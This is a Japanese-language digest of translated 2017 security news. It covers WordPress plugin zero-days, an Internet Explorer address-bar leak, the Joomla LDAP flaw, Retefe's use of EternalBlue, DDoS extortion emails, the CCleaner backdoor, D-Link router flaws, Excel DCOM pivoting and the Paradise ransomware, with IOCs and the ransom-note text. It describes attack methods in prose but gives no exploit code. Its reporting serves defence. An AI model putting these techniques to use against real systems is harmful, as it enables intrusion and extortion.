
     「この脆弱性は、攻撃者が、リーモート・ファイル(PHPバックドア)を取ってきて、それを彼らの選択した場所に保存することを脆弱なWebサイトに発生させることを可能にする」と、Wordfenceの研究者Brad Haasは発言している。
     Haasによると、この脆弱性を悪用することは滑稽なほどに簡単である(犠牲者のサイトに送信するHTTP POSTリクエストを内部に脆弱性攻撃プログラム・コードを包含することを要求する)。攻撃者は脆弱性攻撃プログラムの引き金を引くために、そのサイトに認証してもらう必要はない。
     Flickr Galleryプラグインを実行しているサイトに関しては、ハッカーは、そのサイトのルートURLをターゲットにしなければならない。他の二つに関しては、ハッカーはadmin-ajax.phpファイルでPOSTリクエストを狙わなければならない。
     このハッカーが、サイトを欺いてバックドアをダウンロードさせると、このハッカーは数分以内にサイトを乗っ取ることができる。

    21,000サイトに脆弱性がある

     Wordfenceは、一連のハッキングされたサイトを調査し、これまでの悪用の証拠を発見した後、0-Dayを検出したと発言している。
     良いニュースと悪いニュースがある。良いニュースは、合わせて凡そ21,000インストールと、これらのプラグインに人気がないことである。
     悪いニュースは、この0-Dayは悪用することが簡単であり、他のハッカーは、この脆弱性攻撃プログラム・コードを推定するために、このプラグインの変更履歴を解析して模倣することができることである。
     これらの0-Dayの中核となる脆弱性は、CVSSv3 severity scale(共通脆弱性評価システムCVSSv3)で 9.8/10 のスコアである。これは大変高い値であり、「緊急」に分類される脆弱性である。
     Webサイトの所有者は、これらのプラグインをパッチされたバージョンにアップデートすることができるし、安全なサイトにするために、これらのプラグインをアンインストールすることもできる。以下が、この脆弱性を修正したプラグインのバージョンである。

    ・ Appointments、製作: WPMU Dev (修正版 2.2.2) [~ 9,000 インストール]
    ・ Flickr Gallery、製作: Dan Coulter (修正版 1.5.3) [~ 4,000 インストール]
    ・ RegistrationMagic-Custom Registration Forms、製作: CMSHelpLive (修正版 3.7.9.3) [~ 8,000 インストール]


    Internet Explorerのバグは、URLアドレスバー中にユーザがタイプしたことをリークする
    BleepingComputer : News>Security (2017/09/27)


    ロードは中止された。
    あなたの心を読もう。あなたは、此処に行きたかった:
    http://BleepingComputer.com

     MicrosoftのInternet Explorerは、ユーザが、URLアドレスバー中にタイプしていることを検出することを、ペテンにかけようとするサイトに可能にする深刻なバグによる影響を受けている。
     これは、ユーザが移動しようとしているかもしれない新しいURLを含むが、検索用語も、IEが自動的にBing検索を介して処理することも含まれている。
     セキュリティ研究者Manuel Caballeroによってスポットを当てられたこのバグは、標的型攻撃中の偵察行動に使用することができるし、データも、オンライン広告主によって収穫されるのでプライバシー・リスク引き起こす。

    バグは簡単に悪用することができる

     このバグは、IEが(1)悪意あるHTMLオブジェクトタグ付きや、(2)ソースコード中に互換メタタグを特徴として備えているページをロードした時に発生する。この二つの条件を満足することは大変簡単である。
     条件 1: 攻撃者は、ハッキングされたサイト中に悪意あるHTMLオブジェクトタグを隠蔽することができる、あるいは、カスタムHTMLやJavaScriptコードを広告主に可能にする広告を介して、それをロードすることができる。
     条件 2: X-UA-Compatibleは、そのページをレンダリングするのに、どのバージョンのInternet Explorerを選択するのかをWeb制作者に可能にするドキュメントモード・メタタグである。インターネット上の殆ど全てのサイトは、互換メタタグを持っている。

    バグはIEが惑わされることで発生する

     Caballeroによると、JavaScriptコードが悪意あるオブジェクトHTMLタグ中で実行されると、「そのロケーションオプジェクトは混乱し、それ独自のロケーションの代わりにメインのロケーションを戻す。」
     噛み砕いて言うと、これは、これは悪意あるオブジェクトHTMLタグ(これはロードされ、ページ内部を隠蔽されることができる)が、それまでメイン・ブラウザウィンドウで利用可能であったリソースと情報にアクセスできることを意味している。
     このバグの技術的記事に於いて、(ユーザが)「アドレスバーにタイプしたことを知る」ために、悪意あるオブジェクトは、「ユーザがメインページを離れている間に、そのオブジェクトのlocation.hrefを取得する」ことができると、Cavalleroは発言している。
     Cavalleroは、[IEでだけ動作する]デモページをセットアップした。攻撃のデモビデオもまた、以下に埋め込まれている。

    攻撃のデモビデオ

     Cavalleroは、このバグをMicrosoftに通知していない。Bleeping Computerは、コメントを出すためにMicrosoftに手を差し伸べた。
     今迄、Caballeroは、ユーザが悪意あるページのタブを終了した場合でさえ、IEのバックグラウンドに存続し、実行し続けることを、悪意あるJavaScriptコードに可能にするIEのバグを発見している。このバグは、ユーザが悪意あるサイトを訪問した後暫くしてMonero(仮想通貨の一つ)を採掘するために、ユーザのコンピュータリソースを活用する仮想通貨採掘管理ソフトを配布するための悪意ある広告キャンペーンによって乱用される可能性がある。そこで、ユーザのコンピュータはスローダウンし、ユーザのプロセッサの早期摩耗を発生する。
     更に、Caballeroは、Microsoftの最新のブラウザEdge[1, 2, 3, 4]中に多くのセキュリティ・バグを発見している。この内の幾つかを、Microsoftは解決しているが、他は未だである。


    FacebookをハイジャックするFacelikerが急増
    Graham Cluley : News (2017/09/27)
     研究者は、Facelikerとして知られるFacebookをハイジャックする脅威が活発化していると報道している。
     "HTML/Rce.Gen," "JS:Exploit.BlackHole.PR,", "JS/FBJack.I!tr,"としても知られるFacelikerは、少なくとも2013以降活動している。
     これは、特定のコンテンツに関し、偽りの「いいね」を生成することで、ユーザのFacebookアカウントを巧みに操作することで知られるトロイである。McAfee Labsは、このマルウェアの機能に関する補足を明らかにしている

     「Facelikerは、ユーザが悪意ある、あるいはセキュリティ侵害されたWebサイトを訪問した時、ユーザのブラウザに感染する。次に、Facebookアカウントをハイジャックするので、ユーザは、あるコンテンツを「いいね」と思ってクリックしているつもりでも、このマルウェアはそのクリックをリダイレクトする。これは、ユーザの認識も同意もなく、別の「いいね」ボタンを代わりにクリックしたことになるので、本質的に各ユーザはクリック詐欺の共犯者にさせられてしまう。」

     このような行動は、彼らの製品の評判を高める目的で、彼らの「サービス」をコンテンツ・クリエーターに販売しているFacelikerハンドラーを勢いづかせることになる。
     これは、今日、世の中にモラルのないコンテンツ制作者の数が増加しているかのように見える。実際、2017年の第一、第二四半期の間に、McAfeeは、検出されたマルウェア・バイナリの総数のうち、Facelikerの挙動が2%から8.9%へ増加していることを検出している。


    発見されたマルウェア中のFacelikerの百分率(【訳注】 横軸 Q2-17 は、2017年第二四半期の意味)

     Facelikerの増加は十分厄介である。しかし、利益を生み出す機会を与えられたので、この脅威が近いうちに去ることは絶対にないだろうと、McAfee Labsの副社長Vincent Weaferは考えている。

     「Facelikerは、ソーシャルメディアや、今日ますます広まっているアプリケーションベースのコミュニケーションを活用し巧みに操作している。アプリケーションや新しい記事を作成することは、より一般的になっており、受け入れられ、友人間で当然の事になっているようなので、未知の行動者は、価値や真実さえ見抜く方法に、こっそり、影響を与えることができる。」

     Facelikerのような脅威を防御するには、ユーザは、彼らがオンラインでどのようなサイトを訪問しているのか、どのようなリソースから、そのWebでホストされているファイルをダウンロードしていのかに用心する訓練をすべきである。彼らはまた、彼らのパスワードを盗む能力のあるマルウェアを防止する手段として、Facebookアカウントや、他のソーシャルメディア・プロファイルを二要素認証で間違いなく保護すべきである。


    8年間、ハッカーはJoomla中のパスワードを盗むことのできるフローを悪用可能だった
    Bitdefender : Hot For Security (2017/09/25)
     過去8年間、緊急の脆弱性がJoomla CMSのコード中に潜在していた。この脆弱性は、悪意あるハッカーが、全てのユーザのログイン認証(管理者に属する物を含む)を盗むことを可能にするものであった。
     CMSとはコンテンツ・マネージメント・サービスである。これは、訪問者が見たいWebページや画像を見る機会を保証するために、あなたのWebサイトの全てのコンテンツを管理するソフトウェアである。そのようなものなので、CMSは、多くの企業にとって、彼らが顧客にコンテンツを配信する方法の必須の部分である。
     それ故、あなたのWebサイトのCMSで、新しく発見された脆弱性をパッチし続けることは大変重要である。
     この深刻なセキュリティホール(先週リリースされたJoomla v3.8でパッチされた)は、ドイツのセキュリティ企業RIPS Techによって公開された。
     今まで知られていなかったインジェクション脆弱性は、JoomlaのLDAP(Lightweight Directory Access Protocol。【訳注】 ネットワーク機器やユーザーなどの情報を管理するディレクトリサービスへ接続するためのプロトコル(@ITネットワーク用語事典より))認証コード中に存在していた。このソフトウェアの影響を受けるバージョンがユーザ・インプットを適切にサニタイズ(【訳注】 秘密にしておかなければならない情報を除去すること)しないので、この脆弱性はWebサイトのCMSログイン・ページを介して悪用することが可能であった。研究者の説明として:

     LDAPクエリーに使用されるユーザ名認証のインプット・サニタリゼーションの欠如は、敵対者がLDAP検索結果のセットを改竄することを可能にする。ワイルドカード文字の使用や様々な認証エラーメッセージを観察することによって、攻撃者は、文字列毎に認証を推測するペイロードの列を送信することで、徐々にログイン認証をまさに検索することができる。

     攻撃が成功すると、ハッカーは管理者のログイン認証を盗むことができるようになり、Webサイトは完全に制御されることになる。
     Joomlaは、世界で最も人気のあるCMSの一つであり、数百万のWebサイトによって使用されている。結果として、管理者パスワードをリークすることを可能にするあらゆる脆弱性は、驚くべきこととして考えなければならない。しかしながら、この発見をさらにショックにしていることは、ハッカーが(8年前にリリースされた)Joomlaのバージョン1.5以降このフローを悪用することが可能であったことである。
     Joomlaはオープンソース・ソフトウェアであり、セキュリティホールに関する脆弱性は定期的に検証されている、そして、誰も今迄この緊急のフローを発見していなかった。オープンソース・ソフトウェアのアイデア(誰もが脆弱性を検証しチェックすることを可能にしている)は、素晴らしいアイデアである。しかし、誰もが50万行のコード中のセキュリティホールを探しまわることができるというだけで、全てのバグが発見されるということを、あるいは、あなたのWebサイト全体をセキュリティ侵害に導くことが可能な緊急の脆弱性が、タイミングよく発見されることを意味していない。
     今回の場合、ありがたいことに、Joomlaは研究者がこの脆弱性について通知した後、タイムリーにその脆弱性を確認し修正した。あなたは最新のCMSにアップデートし、将来の緊急のセキュリティ問題を見守ることを確実にすることによって、あなたは、サイトがセキュリティ侵害されるリスクを減少するための本分を尽くすことができる。
     このJoomlaセキュリティホールの発見に8年掛かったこと、その間に、悪意あるハッカーがこの脆弱性を悪用していたか否か、決して分からないことは残念である。


    EternalBlue脆弱性攻撃プログラムがRetefeバンキング・トロイに使用されていた
    Kaspersky : ThreatPost (2017/09/22)
     Retefeバンキング・トロイの背後にいる犯罪者は、を彼らのマルウェアに対して新しいコンポーネントとして米国国家安全保障局(NSA)が作成した脆弱性攻撃プログラムEternalBlueの使用を追加していた。
     このアップデートは、パッチされたWindowsの脆弱性に対してRetefeをSMBv1攻撃を身につけた最新のマルウェアにしており、最新のトレンドを示していると、Proofpointの研究者は発言している。今年早く、Flashpointの研究者は、TrickBotバンキング・トロイが同様にEternalBlueモジュールを追加したことを観察した。
     Retefeは、DridexやZeusのような類似のトロイに、スケールや評価では決して及ぶものではないが、その興味ある実装とオーストリア、スウェーデン、スイス、日本、最近では英国と一貫して地域に焦点を当てることで注目されていると、研究者は発言している。
     「オンライン・バンキング・セッションをハイジャックするためにWebインジェクションに依存するDridexや他のバンキング・トロイと異なり、Retefeは、様々なプロキシサーバー(しばしば、TORネットワーク上にホストされる)を介してターゲットにした銀行の、行き帰りのトラフィックをルーティングすることによって行動する」と、木曜日のテクニカル投稿でProofpointは、その調査を説明している。
     過去数カ月間に渡り、研究者は、悪意あるMicrosoft Officeドキュメントを含む迷惑メールから成る新しいRetefeキャンペーンの波を観測してきた。添付ファイルは埋め込まれたPackage Shell ObjectsもしくはObject Linking and Embedding Objects(一般的には、Windowsショートカット ".lnk" ファイル)を含んでいると、研究者は発言している。
     ユーザがショートカットを開き、表示されるセキュリティ警告を受け入れたなら、PowerShellコマンドは、リモートサーバ上にホストされている自己解凍形式のZipアーカイブのダウンロードを開始する。このZipアーカイブは難読化されたJavaScriptインストーラを含んでいる。
     研究者がJavaScriptインストーラの難読化を解除した時、彼らは幾つかの設定セッション・パラメータを発見した。ここ数週間で、ターゲットにされたネットワークに横方向に拡散するために使用することのできるEternalBlue脆弱性攻撃プログラムを実装するスクリプトへの参照パラメータ"pseb:"が追加されたと、研究者は発言している。
     「我々は最初、9月5日に"pseb:"パラメータを観察した。"pseb:"設定は、EternalBlue脆弱性攻撃プログラム(そのコードの殆どは公に利用可能なプルーフ・オブ・コンセプト(概念の実証)からの借り物)を実装している」と、研究者は記述している。
     Proofpointは、この敵によって使用されたEternalBlueパラメータはまた、そのインストレーションと犠牲者の設定の詳細をログする機能と、FTPサーバにデータをアップロードする機能を含んでいると発言している。
     EternalBlueのこの実装に関するペイロード設定は、リモートサーバからPowerShellスクリプトをダウンロードする。これは、Retefeをインストールする埋め込まれた実行ファイルを含んでいると、研究者は発言している。
     「我々は、EternalBlue脆弱性攻撃プログラムの追加で、最初のターゲットをセキュリティ侵害したなら、ネットワーク中で効果的な伝搬のための機会を作成するところの、このグループからの活発さを増す標的型攻撃を観察している」と、Proofpointは記述している。
     研究者のメモ、9月20日、"pseb"セクションは、EternalBlueログイン機能だけを含む新しい"pslog"セクションで置き換えられた。「このインストレーションは、しかしながら、EternalBlueを介して更に横方向に拡散するための責任を負う"pseb"モジュールを欠いている。それ故、無限拡散ループを回避している」と、彼らは発言している。
     研究者は、企業がEternalBlue脆弱性(CVE-2017-0144)に対する完全なパッチを間違いなく適用するように促している。「企業は、IDS(Intrusion Detection System、不正侵入検知)システムとファイアーウォールで関連するトラフィックをブロックし、eMailゲートウェイで悪意あるメッセージをブロックすべきである」とProofpointは追加している。


    DDoS攻撃脅迫グループが数千の企業に身代金の要求を送信している
    BleepingComputer : News>Security (2017/09/22)
     Phantom Squadの名前を使用しているDDoS脅迫者グループは、世界中の数千の企業に対して膨大なスパム(犠牲者が要求される身代金を支払はない場合には、9月30日にDDoS攻撃すると脅迫)を送信し続けている。
     身代金の要求を広めているeMailは、セキュリティ研究者Derrick Farmerによって最初に発見された。この脅威は9月19日に開始され、以降継続中のようである。

    ハッカーは僅か700$の身代金を探している

     このeMailは一つの簡単な脅迫(企業に0.2 Bitcoin(~720$)を支払うように、さもなければ、9月30日に彼らのWebサイトを停止させる準備をすると告げている)を含んでいる。


    Phantom Squad DDoS脅迫eMailのサンプル 

     通常、このようなeMailによる脅迫は、受信した企業が支払わない場合に、脅迫者が攻撃を実行するために、一企業ずつ僅かな数の企業に対して送信される。
     今回、このグループは、他の形式のマルウェアを拡散する従来のスパムキャンペーンに従って、同時に複数の相手に対してeMailを無闇矢鱈に送信しているかのようである。
     このため、このeMailと身代金要求を検証した数人の専門家は、このグループが同時に多くの標的にDDoS攻撃を起動するための射撃能力を所有していないので、十中八九愚かな犠牲者が支払ってくれることを希望した脅迫戦略を使用しているという結論に達した。

    脅迫者達は頭の回転がよろしくない

     このeMailスパムの波の大きさは、多くの専門家を驚かせた。その衝撃は、直ちにソーシャルメディア[1234]とWebマスターフォーラム(システム管理者が、脅威を取り扱う方法に関する支援と意見を探しに行く場所)上の反応となって現れた。
     Bleeping Computerは、この大きさのスパム攻撃の波に関する一般的な考えを得るためにセキュリティ企業数社に働きかけた。
     「ボリュームの点から、どのように広がるかは不確かであるが、それらは確実に多くの人々をスパミングするだろう」と、Cloudflare(【訳注】 コンテンツデリバリーネットワークや分散型ドメイン名サーバシステムを提供するアメリカ合衆国の企業(Wikipediaより))のTrust & Safetyの責任者Justin Paineは、Bleeping Computerに告げている。
     「我々は、今までにPhantom Squad eMailを報告してきた5人の顧客を持っている」とし、更に「これら天才達は、メジャーなDDoS緩和企業用の noc@ アドレスに対してさえ身代金脅迫を送信している」と、彼は付け加えている。

    脅迫者達はeMailテキストを「再利用」している

     Radwareの技術陣は類似のレポートを受け取ったので、この会社は独自のセキュリティ警告を発行したほどである。
     Radwareのセキュリティ研究者Daniel Smithは、この脅迫者達は実際のPhantom Squad(2015年の冬に様々なゲームネットワークを引きずり倒したDDoS攻撃者のグループ[12])ではない可能性があると指摘している。
     Smithは、この脅迫文が、2017年6月にArmada Collectiveの名前を使用した別の脅迫者グループが使用したものと殆ど同一であることに気が付いた。DDoS攻撃の脅威を介して企てられたこの脅迫もまた、単なる脅しであることが証明された。それであるにも拘わらず、幾つかは成功した。
     「私が興味を抱いた部分は、先月の身代金の要求額と比較して身代金額が低いことである」と、「先月、Anonimousの名前で知られる偽のRDoS(【訳注】 Ransom DDoS、DDoS攻撃を伴うサイバー脅迫)グループは、幾つかの銀行に100 Bitcoinの身代金を要求していた」と、SmithはBleeping Computerに告げた。

    専門家たちは、このグループがDDoS攻撃を起動できるとは信じていない

     これはransom DDoS (RDoS、DDoS攻撃を伴うサイバー脅迫)攻撃の漸次的な進歩(グループは、業種内部の少数の企業グループをターゲットにすることから、複数の企業から少額の支払いを引き出すことを期待して多数のターゲットに移行している)を示している。
     「これは、最新のRDoSキャンペーンが出現したということである」と、「RDoS攻撃が一段落した後の2016年春、グループは彼ら自身をArmada Collectiveと呼んで出現したが、彼らの手口は明らかに変更されていた。Armada Collectiveであると主張するこのグループは、最早小さな数の犠牲者をターゲットにしていない。代わりに、サンプル攻撃を起動することなく一度に多数の犠牲者をターゲットにした」と、Smithは発言している。
     「結果として、社会不安と悪名高い名前を悪用することによって数千ドルを得ることが可能になった。2016年と2017年に出現した他の幾つかの模倣グループは、New World Hackers, Lizard Squad, LulzSec, Fancy Bear, Anonymousのようなグループの名前を利用している。」
     「一連のdenial-of-service攻撃を起動するために、このグループは巨大なリソースを要求する。それ故、グループが多数の脅迫文を送信する時、彼らは一般的にサイバー攻撃を遂行することはないだろう」と、Smithは発言している。
     Smithの意見は、Paine(この人は最近、「このグループ=スパムからの身代金要求」そして、「この模倣者からの空虚な脅迫、中身のない攻撃」とツイートした)によっても共有されている。

    犠牲者は当局に脅迫行為を通報すべし

     Japan CERT(JPCERT、一般社団法人 JPCERT コーディネーションセンター)は、当局に、このeMailを通報してもらうことによって、インチキの要求の取り扱い方法を企業に通知するために、セキュリティ警告をリリースした。
     本日、他のシステム管理者やセキュリティ研究者に身代金脅迫を信じないように知らせるために、セキュリティ研究者Brad Duncanもまた、ISC SANSフォーラムに警告を発表した。


    CCleanerマルウェア重大事故。あなたが知る必要のあることと、削除方法
    BleepingComputer : News>Security (2017/09/18)
     これは、CCleaner 5.33.6162の32-bitバージョンによってインストールされたマルウェアに関する簡単なガイドとFAQである。発生したことの完全な要約に関しては、我々のこれ以上はないCCleanerに関する報道を読みなさい。

    何が起きたのか?

     未知の悪しきグループがCCleanerの基盤をセキュリティ侵害した。
     この攻撃者は、CCleaner 5.33.6162 と CCleaner Cloud 1.07.3191の32-bitバージョンにマルウェアを追加した。
     このマルウェアを追加されたCClenaerのバージョンは、8月15日から9月12日までの間、ダウンロードすることが可能になっていた。

    誰が感染したのか?

     上記期間に影響を受けたバージョンをダウンロードしインストールした全ての人々。
     Avastは、感染させられたマシンの数は227万と見積もっている。

    どのようにすれば感染したことが分かるのか?

     CCleanerの感染させられたバージョンをインストールすると、HKEY_LOCAL_MACHINE\SOFTWARE\Piriform\Agomo にレジストリのキーが作成される。このキーの下に、MUID と TCIDと名付けられた二つのDate値が存在する。これは、インストールされたFloxif感染によって使用される。


    セキュリティ侵害されたCCleanerによって作成されたレジストリ キー

     Registry Editorを使用してAgomoキーに移動し、これらのキーが存在しているか否か確認しなさい。存在しているのであれば、あなたは、このマルウェアに感染している。
     注意。以下に見られるように、バージョン 5.34へのアップグレードは、WindowsレジストリからAgomoキーを削除しない。このアップグレードは、悪意ある実行ファイルを正当な実行ファイルに置き換えるので、このマルウェアは最早存在しなくなる(【訳者補注】 後述されていますが、このマルウェアはCCleaner実行ファイル内部に存在しています。実行ファイルをアップデートすることでマルウェア自体が削除されます)。


    アップグレード後も存在しているレジストリ キー

    Floxifマルウェアは何を実行するのか?

     Floxifと名付けられているこのマルウェアは、感染したコンピュータから、コンピュータ名、インストールされているソフトウェアのリスト、稼働プロセスのリスト、最初の3つのネットワーク・インターフェース用のMACアドレス、各コンピュータをある程度同定する一意のIDのようなデータを収集する。
     このマルウェアは、他のマルウェアをダウンロードし実行することもできるが、Avastは、攻撃者達が、この機能を使用した形跡を発見していないと発言している。

    FloxitもしくはCCleanerマルウェアを、どのように削除するのか?

     このマルウェアは、CCleaner実行ファイルそれ自体に埋め込まれている。CCleanerを v5.34にアップデートすると今迄の実行ファイルとマルウェアは削除される。CCleanerは自動アップデートシステムを持っていないので、ユーザは、CCleaner 5.34を手動でダウンロードしインストールする必要がある。
     Avastは、CCleaner Cloudユーザにアップデートを既に押し付けており、そのユーザ達は問題ないはずであると発言している。このクリーンなバージョンは、CCleaner Cloud 1.07.3214 である。

    他に何か?

     このマルウェアは、ユーザが管理者権限を使用している場合だけ実行される。あなたが低い権限のアカウントを使用して CCleaner 5.33 をインストールしたのであれば、あなたは感染していない。あなたがWindows 7 Home Premiumを実行している場合は、あなたのメイン・アカウントは十中八九、管理者権限である。そして、あなたが、このバージョンのCCleanerをインストールしたのであれば、感染していると考えるべきである。
     それ故、バージョン5.34にアップデートすることが推奨されている。

    何故アンチウィルス・ソフトは、この感染を捕獲できなかったのか?

     マルウェアを含むCCleanerのバイナリは正当なデジタル証明書を使用して署名されていた。


    研究者は、決してパッチされない虞のあるD-Linkルータのセキュリティホールを明らかにした
    Sophos : Naked Security (2017/09/12)
     あなたが、D-Link DIR-850L AC1200 Dual Band Gigabit Cloudルータを持っているのであれば、我々は、幾つかの面であなたにとって悪いニュースを持っている。
     研究者Pierre Kimによると、この製品は、Kimが「このルータを即座にインターネットから切り離す」ことを所有者に推奨している、大変深刻な10のセキュリティ脆弱性を持っている。
     これは厄介なように見えるが、もっと悪い。まず、Kimは、D-Link(【訳注】 台湾の情報通信機器会社)と最初に連携することなく、このフローを公開した。彼が、昨年他の製品(DWR-932Bモバイル・ホットスポット・ルータ)で通知した問題に対して、この企業が殆ど反応しなかったので、この通常ではないステップを採用したと発言している。  第二に、D-Linkの緩慢で無応答(そして、AC1200ルータは数カ月前製造中止になったという事実)は、決して最新のフローを完全にパッチすることはないという可能性の増大である。
     Kimは、このフローを0-Dayとして説明しているが、彼が不快な詳細中にそれらの存在を今明らかにしたので、厳密には最早真実ではない(0-Dayは、公開されていないい未パッチのフローである)。
     Kimの要約:

     基本的に、すべてのものLANからWANまでセキュリティ侵害されていた。カスタムMyDlinkクラウド・プロトコルでさえ乱用されていた。

     これらは以下を含む:

    ・ 攻撃者が新しいイメージをアップロードすることを可能にするrevAハードウェア用ルータのファームウェアに関する保護の欠乏。revAは、ハードコードされたパスワードを持っている。
    ・ 多くのクロスサイト・スクリプティング(XSS)のフロー。
    ・ このデバイス クラウド・プロトコル実装中でシツコイほど繰り返される弱点。
    ・ revBルータはバックドア アクセスを許可する。
    ・ DNS設定を保護するための認証の欠乏。

     これは、D-Linkが製品セキュリティでトップニュースになった最初のことではない。Naked Securityは、最近数回レポート(DIR-820Lでの2015問題と、CVE-2017-6206に指定された2017年始めからのフローの集まりを含む)した。
     2017年の初め、D-Linkは米国連邦取引委員会を困らせてさえいた(そのIPカメラとルータ中のフローを修正しないと、この会社が主張したことに関して米国連邦取引委員会が提訴したこと)。
     修正されない可能性のあるフローを公開することに、ある人々はKimを不快に思うかもしれないが、反論は、それらが存在していることを知ることは、無知である恐ろしさより好ましいというものである。
     この問題の核心は、この会社が2013年に製造し2016年まで販売した製品を製造中止にしたが、ユーザは、その後数年間使用し続けるということにある。
     この会社が、その製品が(【訳者補注】 後継機に)取って代わられた日の後に発見されたフローを修正しないのであれば、その所有者達は我慢しなければならない。もともと、そのような企業が、その場にいるべきではないが、法的には、企業は将来に渡りフローをパッチし続けることを義務付けられてはいない。
     残念なことに、ルータは、その箱に「消費」期限を付けて販売されていない、多分彼らは、すべきだろう。


    Excelを嫌うもう一つの理由: Excelのマクロは攻撃をピボットする事を支援する
    The Register : Security (2017/09/12)
     ホワイトハット(【訳注】 システムのセキュリティホールを見つけて、悪用することなくシステム管理者にそれを知らせる"良い"ハッカー(Weblioより))は、あなたが、Microsoft Excelを使用して、あるマシンから他のマシンに攻撃をピボットできるか否かを十分観察した、そして、あなたは彼が発見したことを好まないだろう。
     この研究者(SpecterOps(@enigma0x3)のMatt Nelson)は、不正確なDefaultの起動とアクセス・パーミッションを発見したと記述している。これは、マクロベースの攻撃が、その犠牲者と対話する必要がないことを意味している。
     簡潔に言うと: Excel.ApplicationはDCOMを介して露出する; それは起動とアクセス・パーミッションのセットを検証しない; 攻撃者は最初のセキュリティ侵害に関して幾つかの他の方法を発見する必要があるだろうが、Microsoft Office Macroセキュリティは、このピボットを停止しないだろう; そして、Excel.Applicationは、遠隔から起動(そして、対話的に)させられることが可能になる。
     これは、リモート攻撃者が、悪意あるマクロを含むExcelスプレッドシートを押し付けることができることを意味している。そして、「VBAは、Win32 APIアクセスを可能にしているので、この可能性は様々なシェルコードランナーにとってエンドレスである。」
     その概念の実証で、Nelsonは特に邪悪なものを実行していない。彼は単に、calc.exeを起動したのだが、それはあまりにも簡単である。
     「新しいマクロを作成し、それに任意の名前を付ける、あなたのコードに追加し、次に、それを保存する。この例では、私のマクロ名は'MyMacro'であり、このファイルを .xls フォーマットで保存している。」
     このデモ中の計算機は、Excelのチャイルドプロセスとして発生させられるが、Nelsonは、「VBAは、そのOSとの相互作用の観点から多くのことを提供しているので、チャイルドプロセスを発生させず、代わりに、他のプロセスを挿入することを可能にしている」と注意している。
     「最後のステップは、遠隔からExcelオブジェクトをクリーンアップし、ターゲットのホストからペイロードを削除することである」と、彼は追加している。
     これは、Local Administratorグループ権限を持つユーザに制限されているが、そのベクトルは十分深刻なまま残っている。結局、これは、そのグループ中のマシンが既にセキュリティ侵害されているとNelsonが考えるピボット攻撃である。
     緩和策は存在するが、彼は、それらの緩和策が面倒な事態を引き起こすかもしれないと警告している。システム管理者は、Excel.Applicationを手動でリモートから起動しアクセス・パーミッションを設定することができるが、これは他のOfficeアプリケーションに影響を与える虞がある。
     他の緩和策は、その起動を編集し、discretionary access control lists (DACLs、随意アクセス制御リスト)にアクセスするためにdcomccnfg.exeを使用すること、並びに、WindowsファイアーウォールをONにすることとローカル管理者の数を制限することを含んでいる。

    ピボット(Pivot)に関する参考資料(McAfee > Secureingtomorrowより)


    1. 直接攻撃は大変多くの証拠を残す
    2. 疑うことを知らない人々は、悪意あるリンクをクリックし、マルウェアをインストールする。
    3. その攻撃は、攻撃者の起源を隠すために、感染したシステムから起動される


    Paradise身代金要求型マルウェアは、ファイルの暗号化にRSA暗号化を使用している
    BleepingComputer : News>Security (2017/09/11)
     本日、Paradiseと呼ばれる新しい身代金要求型マルウェアの犠牲者の一人が、Bleeping Computerのフォーラムに投稿し、我々が検証することのできるサンプルをアップロードした。この身代金要求型マルウェアは、決して革新的なものではないが、これは、積極的に拡散していることとRansomware as a Service (RaaS、サービスとしてのランサムウェア)なので、私は、この身代金要求型マルウェアの動作方法の簡単な解析を提供しようと考えた。
     残念ながら、Paradise身代金要求型マルウェアは、身代金を支払わずに復号することはできないし、影響を受けたユーザは、代替方法でファイルを復号することを試みるべきである。この身代金要求型マルウェアに関して支援を受けたり、論議したいのであれば、専用のParadise Ransomware Support Topicを使用しなさい。

    Paradise身代金要求型マルウェアはRansomware as a Service (RaaS)かもしれない

     Paradise身代金要求型マルウェアはRansomware as a Service (RaaS)であるかのように見える。RaaSは、身代金要求型マルウェアの開発者が身代金要求型マルウェアを作成し、その開発を管理し、犠牲者によって支払われた全身代金の一部と引き換えにCommand and Control(C&C、コマンドアンドコントロール)サーバを運用するものである。支払われた身代金の残りを得る提携者の仕事は、彼らが適切とする身代金要求型マルウェアをディストリバイトすることである。
     現時点で、以下が、このRaaSに関連するeMailである。

    tankpolice@aolonline.top
    edinstveniy_decoder@aol.com
    info@decrypt.ws

    Paradise身代金要求型マルウェアは、どのようにコンピュータを暗号化するのか

     現時点で、Paradiseがコンピュータに感染する方法は未知であるが、感染したコンピュータのイベントログから、ハッキングされたリモートデスクトップサービス経由の可能性がある。けれども、一旦実行されると、Paradiseは、管理者特権を取得するためにそれ自体を再起動し、次に、一意のRSA-1024キーを生成する。このキーは、そのコンピュータ上の各ドライブにあるファイルの全てを暗号化するために使用される。
     ファイルを暗号化すると、id-[affiliate_id].[affiliate_email].paradise文字列を暗号化したファイル名に追加する。例えば、test.jpgという名前のファイルが暗号化されるとtest.jpgid-3VwVCmhU.[info@decrypt.ws].paradiseになるだろう。


    Paradiseで暗号化されたフォルダ

     Paradiseはファイルの暗号化にRSA暗号化を使用するので、暗号化プロセスは非常に緩慢である。これは希望的には、暗号化が実行されている生け贄になっている時間を検出し、その停止を可能にする。
     この身代金要求型マルウェアはコンピュータの暗号化を終了すると、#DECRYPT MY FILES#.txtと名付けられた脅迫文を、ファイルが暗号化されたフォルダ中に投下する。この脅迫文は、提携先のeMailアドレスと、支払いの実行方法の指示を含んでいる。


    Paradise身代金要求型マルウェアの脅迫文

     Paradiseは次に、Base64でエンコードされた壁紙画像を抽出し、それをdesk.bmpとして%Temp%フォルダに保存する。この身代金要求型マルウェアは次に、この画像を犠牲者のデスクトップ背景画像として設定する。


    Paradise身代金要求型マルウェアのデスクトップ背景画像

     最終的に、この身代金要求型マルウェアは犠牲者のファイルを暗号化するために使用したRSA暗号化キーを%UserProfile%\DecriptionInfo.authファイルに書き込む。このファイルは次に、この身代金要求型マルウェア実行ファイルに同梱されているマスター暗号化キーによって暗号化される。これは、犠牲者が身代金を支払った後に、犠牲者に一意のRSAキーを、この開発者が抽出することを可能にするためである。

    IOCs

    Hashes:
    SHA256: 82cfb70e00f357065b68861e71f04b0af33d77fb63e72997b81c3c0402bf5c80

    Paradise身代金要求型マルウェア関連ファイル:
    #DECRYPT MY FILES#.txt
    %UserProfile%\Desktop\DecriptionInfo.auth
    %UserProfile%\AppData\Local\Temp\desk.bmp
    %UserProfile%\Failed.txt
    %UserProfile%\Files.txt

    Paradise身代金要求型マルウェアNote Text:

    [WHAT HAPPENED]

    Your important files produced on this computer have been encrypted due a security problem
    If you want to restore them, write us to the e-mail: info@decrypt.ws
    You have to pay for decryption in Bitcoins. The price depends on how fast you write to us.
    After payment we will send you the decryption tool that will decrypt all your files.

